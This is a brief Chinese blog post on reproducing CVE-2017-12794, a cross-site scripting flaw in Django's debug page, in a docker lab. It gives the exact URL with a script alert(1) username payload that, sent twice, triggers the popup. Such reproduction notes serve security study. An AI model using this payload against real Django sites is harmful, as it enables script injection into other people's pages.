Django debug page XSS漏洞(CVE-2017-12794)复现
2020-09-01 17:51 rnss 阅读(732) 评论(0) 收藏 举报参考:https://paper.seebug.org/402/
使用docker搭建环境
访问:http://your-ip:8000/create_user/?username=<script>alert(1)</script>
成功创建一个用户
再次访问 http://your-ip:8000/create_user/?username=<script>alert(1)</script>
触发弹窗
浙公网安备 33010602011771号